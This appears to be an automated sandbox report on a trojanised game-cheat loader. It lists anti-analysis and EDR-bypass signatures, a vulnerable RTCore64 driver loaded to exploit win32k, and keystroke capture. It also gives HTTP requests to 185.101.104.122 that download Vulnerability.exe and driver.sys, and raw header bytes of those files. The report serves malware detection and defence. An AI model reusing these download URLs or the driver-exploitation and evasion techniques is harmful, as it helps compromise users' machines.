Windows Analysis Report
Iyto7FYCJO.exe

Overview

General Information

Sample name: Iyto7FYCJO.exe
renamed because original name is a hash value
Original sample name: e12627a292cf6a7d32adb932adbd2b3b.exe
Analysis ID: 1538236
MD5: e12627a292cf6a7d32adb932adbd2b3b
SHA1: 2f6bf97cd38104937b7f47be38a00f0cea9a6f4a
SHA256: eeca777e359e475f4bf1d137bd60dc0194e9520c0047a388ef28d383dc04250e
Tags: 64, exe, trojan

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Accesses win32k, likely to find offsets for exploits
Detected VMProtect packer
Drops executables to the windows directory (C:\Windows) and starts them
Found direct / indirect Syscall (likely to bypass EDR)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly setting hooks in foreign process
Sample is not signed and drops a device driver
Tries to detect debuggers (CloseHandle check)
Tries to detect virtualization through RDTSC time measurements
Tries to evade analysis by executing a special instruction (VM detection)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to query locales information (e.g. system language)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number, etc.) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication

Classification

AV Detection

Source: Iyto7FYCJO.exe Avira: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\driver[1].sys ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Vulnerability[1].exe ReversingLabs: Detection: 55%
Source: C:\Windows\Vulnerability.exe ReversingLabs: Detection: 55%
Source: C:\Windows\driver.sys ReversingLabs: Detection: 62%
Source: Iyto7FYCJO.exe ReversingLabs: Detection: 42%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Vulnerability[1].exe Joe Sandbox ML: detected
Source: C:\Windows\Vulnerability.exe Joe Sandbox ML: detected
Source: Iyto7FYCJO.exe Joe Sandbox ML: detected
Source: Iyto7FYCJO.exe, 00000000.00000002.2223519765.00007FF7A27CB000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_d1808002-5

Exploits

Source: C:\Windows\Vulnerability.exe File opened: C:\Windows\System32\win32k.sys
Source: unknown HTTPS traffic detected: 172.67.72.57:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: Iyto7FYCJO.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: mbols/wi.pdb source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E867000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\ioctl base updated by redshirtfan\build\driver\driver.pdb source: Iyto7FYCJO.exe, 00000000.00000003.2159382259.0000022AC022F000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC0224000.00000004.00000020.00020000.00000000.sdmp, driver.sys.0.dr, driver[1].sys.0.dr
Source: Binary string: win32k.pdbGCTL source: Vulnerability.exe, 00000005.00000002.2106140610.000002B69E8F0000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\wasy\x64\Release\RTCore64_Vulnerability-main\x64\Release\RTCore64_Vulnerability.pdb source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source: Binary string: msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb`2 source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF50000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdbb source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdbW source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: win32k.pdb source: Vulnerability.exe, 00000005.00000002.2106140610.000002B69E8F0000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF50000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2105876310.000002B69D00D000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106140610.000002B69E957000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: s/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69D030000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF50000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: GET /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb HTTP/1.1V source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E836000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Unknown exceptionbad array new lengthstring too longbad cast%02xsymbols\.pdb/\\\.\RTCore64user32.dllwin32u.dllsystemroot\System32\win32k.syshttps://msdl.microsoft.com/download/symbols[-] Failed to Load PDBNtUserSetGestureConfig[-] Failed to Load Symbol of NtUserSetGestureConfig[<] Loading vulnerable driver, Name: [-] Can't find TEMP folder[-] Failed to create vulnerable driver file[-] Failed to register and start service for the vulnerable driver[-] Failed to load driver rtcore64.sysntoskrnl.exe[-] Failed to get ntoskrnl.exewin32k.sys[-] win32k.sys not foundxxxH source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5 source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5.sysF source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rosoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb3.pdbE140.dll source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ConnectionKeep-Alive/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E836000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rosoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF50000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E7F4000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2105876310.000002B69CF5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\wasy\x64\Release\RTCore64_Vulnerability-main\x64\Release\RTCore64_Vulnerability.pdb33 source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source: Binary string: Hostmsdl.microsoft.comGET /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb HTTP/1.1' source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E836000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\Vulnerability.exe Code function: 5_2_00007FF7738F3B60 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort, 5_2_00007FF7738F3B60
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 20 Oct 2024 19:15:02 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 03 Oct 2024 17:41:18 GMTETag: "23800-623960fde9891"Accept-Ranges: bytesContent-Length: 145408Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7d e7 f2 38 39 86 9c 6b 39 86 9c 6b 39 86 9c 6b 30 fe 0f 6b 2f 86 9c 6b 3f 07 98 6a 33 86 9c 6b 3f 07 9f 6a 3d 86 9c 6b 3f 07 99 6a 1b 86 9c 6b 3f 07 9d 6a 3f 86 9c 6b 72 fe 9d 6a 28 86 9c 6b 39 86 9d 6b 31 87 9c 6b 56 07 95 6a 3e 86 9c 6b 56 07 63 6b 38 86 9c 6b 56 07 9e 6a 38 86 9c 6b 52 69 63 68 39 86 9c 6b 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 3e d7 fe 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 26 00 4e 01 00 00 ee 00 00 00 00 00 00 b4 48 01 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 02 00 00 04 00 00 00 00 00 00 03 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 06 02 00 cc 01 00 00 00 50 02 00 e8 01 00 00 00 40 02 00 30 0f 00 00 00 00 00 00 00 00 00 00 00 60 02 00 08 01 00 00 b0 d7 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 d8 01 00 28 00 00 00 70 d6 01 00 40 01 00 00 00 00 00 00 00 00 00 00 00 60 01 00 10 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 93 4c 01 00 00 10 00 00 00 4e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 
72 64 61 74 61 00 00 d4 cb 00 00 00 60 01 00 00 cc 00 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 f0 0c 00 00 00 30 02 00 00 06 00 00 00 1e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 30 0f 00 00 00 40 02 00 00 10 00 00 00 24 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e8 01 00 00 00 50 02 00 00 02 00 00 00 34 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 08 01 00 00 00 60 02 00 00 02 00 00 00 36 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 20 Oct 2024 19:15:03 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 03 Oct 2024 19:27:48 GMTETag: "2a00-623978cbb6377"Accept-Ranges: bytesContent-Length: 10752Keep-Alive: timeout=5, max=99Connection: Keep-AliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 11 41 b6 a6 55 20 d8 f5 55 20 d8 f5 55 20 d8 f5 55 20 d8 f5 54 20 d8 f5 1e 58 d9 f4 56 20 d8 f5 55 20 d9 f5 4e 20 d8 f5 1e 58 db f4 53 20 d8 f5 1e 58 dc f4 50 20 d8 f5 3a a1 dd f4 54 20 d8 f5 3a a1 da f4 54 20 d8 f5 52 69 63 68 55 20 d8 f5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 34 f0 fe 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 26 00 18 00 00 00 0e 00 00 00 00 00 00 00 10 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00 00 0a 00 00 00 00 00 00 00 00 80 00 00 00 04 00 00 74 b0 00 00 01 00 60 41 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 24 00 00 00 60 32 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 31 00 00 40 01 00 00 00 00 00 00 00 00 00 00 00 30 00 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d2 12 00 00 00 10 00 00 00 14 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 68 2e 72 64 61 74 61 00 00 50 06 00 00 00 30 00 00 00 08 00 00 00 18 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 40 00 00 48 2e 64 61 74 61 00 00 00 8c 00 00 00 00 40 00 00 00 02 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c8 2e 70 64 61 74 61 00 00 fc 00 00 00 00 50 00 00 00 02 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 49 4e 49 54 00 00 00 00 04 03 00 00 00 60 00 00 00 04 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 62 2e 72 65 6c 6f 63 00 00 24 00 00 00 00 70 00 00 00 02 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: Joe Sandbox View IP Address: 172.67.72.57 172.67.72.57
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: global traffic HTTP traffic detected: GET /Vulnerability.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.101.104.122Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /driver.sys HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.101.104.122Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 185.101.104.122 (50 identical entries)
Source: global traffic DNS traffic detected: DNS query: keyauth.win
Source: Iyto7FYCJO.exe, 00000000.00000002.2223519765.00007FF7A27CB000.00000002.00000001.01000000.00000003.sdmp, Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC0205000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC019C000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC020A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/Vulnerability.exe
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC019C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/Vulnerability.exeC9?
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC0205000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC020A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/Vulnerability.exeC:
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC0205000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC020A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/Vulnerability.exev
Source: Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC021C000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC0224000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/driver.sys
Source: Iyto7FYCJO.exe, 00000000.00000002.2223519765.00007FF7A27CB000.00000002.00000001.01000000.00000003.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC0224000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/driver.sysC:
Source: Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC021C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/driver.sysW
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC021C000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC021C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/driver.syse
Source: Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC021C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.101.104.122/driver.sysl
Source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E7F4000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr String found in binary or memory: http://crl.globalsign.com/gs/gscodesigng2.crl0
Source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingg2.crl0T
Source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr String found in binary or memory: http://crl.globalsign.net/root.crl0
Source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E7F4000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: Vulnerability.exe, 00000005.00000002.2106005784.000002B69E7F4000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr String found in binary or memory: http://ocsp2.globalsign.com/gscodesigng20
Source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr String found in binary or memory: http://secure.globalsign.com/cacert/gscodesigng2.crt04
Source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingg2.crt0
Source: Iyto7FYCJO.exe, 00000000.00000002.2223519765.00007FF7A27CB000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC019C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://keyauth.win/api/1.2/
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC019C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://keyauth.win/api/1.2/2(f
Source: Iyto7FYCJO.exe, 00000000.00000002.2223519765.00007FF7A27CB000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://keyauth.win/api/1.2/http://185.101.104.122/Vulnerability.exeC:
Source: Iyto7FYCJO.exe, 00000000.00000002.2222572006.0000022AC021C000.00000004.00000020.00020000.00000000.sdmp, Iyto7FYCJO.exe, 00000000.00000003.2159332218.0000022AC021C000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000005.00000002.2106005784.000002B69E83F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: Iyto7FYCJO.exe, 00000000.00000002.2223557132.00007FF7A27F2000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.behance.net/madetypeFree
Source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: Vulnerability.exe, 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000005.00000000.2088962841.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr String found in binary or memory: https://www.globalsign.com/repository/03
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: Vulnerability.exe, 00000005.00000002.2106140610.000002B69E945000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: NtUserGetRawInputData memstr_6d72b45d-7

System Summary

Source: Iyto7FYCJO.exe Static PE information: .vmp0 and .vmp1 section names
Source: C:\Windows\Vulnerability.exe Code function: 5_2_00007FF7738E6810 NtQuerySystemInformation,VirtualFree,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,VirtualFree,DeviceIoControl,DeviceIoControl,DeviceIoControl,DeviceIoControl,memset,DeviceIoControl,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,VirtualFree, 5_2_00007FF7738E6810
Source: C:\Windows\Vulnerability.exe Code function: 5_2_00007FF7738F32C0 NtQuerySystemInformation,VirtualFree,VirtualAlloc,NtQuerySystemInformation,VirtualFree,_stricmp,VirtualFree,VirtualFree,_invalid_parameter_noinfo_noreturn, 5_2_00007FF7738F32C0
